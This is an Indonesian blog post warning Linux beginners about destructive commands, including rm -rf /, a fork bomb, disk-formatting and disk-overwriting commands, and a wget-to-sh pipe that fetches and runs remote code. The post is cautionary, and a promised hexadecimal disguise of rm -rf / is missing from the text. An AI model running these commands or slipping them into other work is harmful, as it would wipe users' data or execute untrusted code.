Jangan Sekali-kali Menjalankan Perintah ini, Jika Linux Kamu Tidak Mau Rusak, Di Karenakan Ini Perintah Sangat Bahaya!

Jangan Sekali-kali Menjalankan Perintah ini, Jika Linux Kamu Tidak Mau Rusak, Di Karenakan Ini Perintah Sangat Bahaya! 5/5 (3)

BeHangat.NetJangan Sekali-kali Menjalankan Perintah ini, Jika Linux Kamu Tidak Mau Rusak, Di Karenakan Ini Perintah Sangat Bahaya! ~ Jumpa lagi dengan admin BeHangat.Net, pada kali ini admin akan memberikan informasi yang sangat penting jika kamu baru di dunia sistem operasi atau OS Linux, Kenapa ini admin inforasikan sangat penting?

Iya Benar, Perintah ini dapat merusak linux jika kamu mencobanya, admin rekomendasikan jangan pernah mencobanya. Memang di Linux banyak perintah yang berguna namun di artikel ini admin hanya menjelaskan u perintah yang berbahaya jika kalain jalankan di linux karena dapat merusak sistem operasi di komputermu.

Perintah yang berbahaya di Linux biasanya menggunakan akses Super User (root/sudo). Berikut ini adalah perintah yang sangat bahaya bagi Linux dan jangan sekali-kali kamu coba.

rm-rf (Perintah Untuk Menghapus Semuanya)

Perintah rm sebenarnya digunakan untuk menghapus file dan direktori. Bila diberikan argumen -rf perintah ini akan menghapus secara rekursif.

  1. -rf = hapus secara rekursif
  2. / = direktori root

Baca Juga : Cara Terbaru Berhenti Unreg Telkomsel di Jamin Berhasil 100%

Perintah tersebut berbahya, karena direktori yang dihapus adalah direktori root (/) dengan kata lain menghapus semua data dari akar-akarnya (root). Kenapa perintah ini sangat bahaya? karena semua filenya akan terhapus.

Samaran dari rm -rf /

Perintah rm -rf / sudah jelas fungsinya yang admin jelaskan di atas, maka banyak orang-orang jahil, berhati busuk atau iri seperti teman yang merebut pasangan, bedanya kalo ini di internet. Di internet banyak orang yang membuat samaran atau alias dari peritnah tersebut. Perintah di bawah ini adalah salah satunya :

Baca Juga : Serial Number dan Aktivasi Microsoft Office 2007 Semua Seri

Perintah di atas adalah bentuk heksadesimal dari rm -rf /.

:(){ :|: & };:

Ada yang tau itu perintah untuk apa? Benar sekali, jika kalian menjalankan perintah ini maka akan menjalankan atau melakukan duplikasi sendiri. Peritah ini akan melakukan duplikat atau mengcopy tanpa henti yang berakibat hang pada komputer dan juga memori pada komputer akan penuh dengan data duplikat tersbut.

mkfs.ext4 /dev/sda1

Perintah mkfs.ext4 /dev/sda1 yaitu untuk format hardisk. mkfs.ext4 berfungsi untuk membuat file sistem ext4./dev/sda1 yaitu partisi pertama pada hardisk.

Baca Juga : Xenta OS – Distro Linux Indonesia Turunan Linux Mint

Berhati-hatilah menjalankan perintah dengan parameter /dev/sd, karena perintah itu akan melakukan sesuatu terhadap hardisk maupun media penyimpanan yang lain.

command > /dev/sda

Perintah command > /dev/sda berfungsi untuk menulis ke hardisk atau menulis ulang di hardisk.

  1. command berfungsi untuk menjalankan perintah apa saja
  2. > berfungsi untuk menulis ulang isi sebuah file, kamu bisa menulis apa saja yang kamu suka
  3. /dev/sda lokasi hardisk (karena hardisk dianggap file di linux)

dd if=/dev/random of=/dev/sda

Perintah dd if=/dev/random of=/dev/sda berfungsi untuk membuat file sampah di hardisk. Perintah dd sebenarnya untuk melakukan copy berserta file sistemnya. Perintah ini memiliki dua parameter yang umum digunakan, if (input stream) dan of (output stream).

  1. if yaitu sumber yang akan di copy
  2. of yaitu tujuannya
  3. /dev/random yaitu file acak
  4. /dev/sda yaitu hardisk yang di gunakan

mv ~ /dev/null

Perintah mv ~ /dev/null berfungsi untuk kirim direktori home ke black hole. Lokasi /dev/null dianggap sebagai lokasi berbahaya. Lokasi ini dijuluki Black Hole, karena apapun yang dikirim ke sana akan menghilang.

  1. mv = Pindah file (cut)
  2. /dev/null = lokasi black hole
  3. Karakter tidle ~ adalah simbol lokasi home

wget http://example.com/something -O – | sh

Perintah wget http://example.com/something -O – | sh berfungsi jika kamu mendownload maka langsung ke install atau langsung di eksekusi.

Baca Juga : Pengertian Dan Penjelasan Teknik Sampling Yang Penting Dalam Penelitian dari Para Ahli

Demikianlah artikel tentang Jangan Sekali-kali Menjalankan Perintah ini, Jika Linux Kamu Tidak Mau Rusak, Di Karenakan Ini Perintah Sangat Bahaya! yang bisa admin berikan ke pada kamu semua. Jika kamu masih ada yang kurang dimengerti silahkan bertanya di kolom komentar yang sudah tersedia dibawah artikel ini, kita diskusi bareng agar saling mengerti dan jangan lupa untuk Share artikel ini agar semakin banyak orang-orang yang mengetahui dan membaca karena dengan membaca kita jadi tambah tahu.

Jika ada kesalahan kata Behangat.Net minta maaf, dan semoga artikel ini berguna, bermanfaat. Terimakasih sudah membaca dan sudah mampir di BeHangat.Net sampai jumpa di pertemuan berikutnya.

Nilai Kualitas Konten

Recommended For You

BeHangat.Net

About the Author: BeHangat.Net

BeHangat.Net adalah website yang membahas tentang berbagai pelajaran dan berita teknologi yang berguna bagi pembaca.

Tinggalkan Balasan

Alamat email Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *

eleven − 4 =